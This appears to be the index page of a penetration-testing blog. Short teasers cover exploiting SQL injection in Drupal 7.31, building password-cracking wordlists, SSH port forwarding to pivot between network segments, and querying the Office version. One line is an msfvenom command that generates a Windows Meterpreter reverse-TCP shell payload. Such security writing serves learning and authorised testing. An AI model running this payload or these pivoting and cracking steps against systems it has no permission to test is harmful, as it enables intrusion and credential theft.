There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

Read more: Drupal to Low Priv Shell

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f js_le -b "\x00\x0a\x0d"

Read more: msfvenom -- Specific Byte Count

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's big and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack passwords, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

Read more: Cewl -- Building Wordlists

Network segmentation is common in the enterprise but becoming more common in smaller environments.  If I compromise a box in my local segment and that box has access to another segment, we can use port forwarding to leapfrog across.

The typical example has us making an actual connection which ties up one of our terminal sessions with an open ssh connection.  Fine, we can spawn a bunch of terminal sessions but we can also background it.

Read more: SSH Port Forwarding

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Read more: Command Line -- Microsoft Office Version

"A problem occurred during the delivery of this message to this e-mail address. Try sending this message again. If the problem continues, please contact your helpdesk."

Read more: #5.1.0 Address rejected.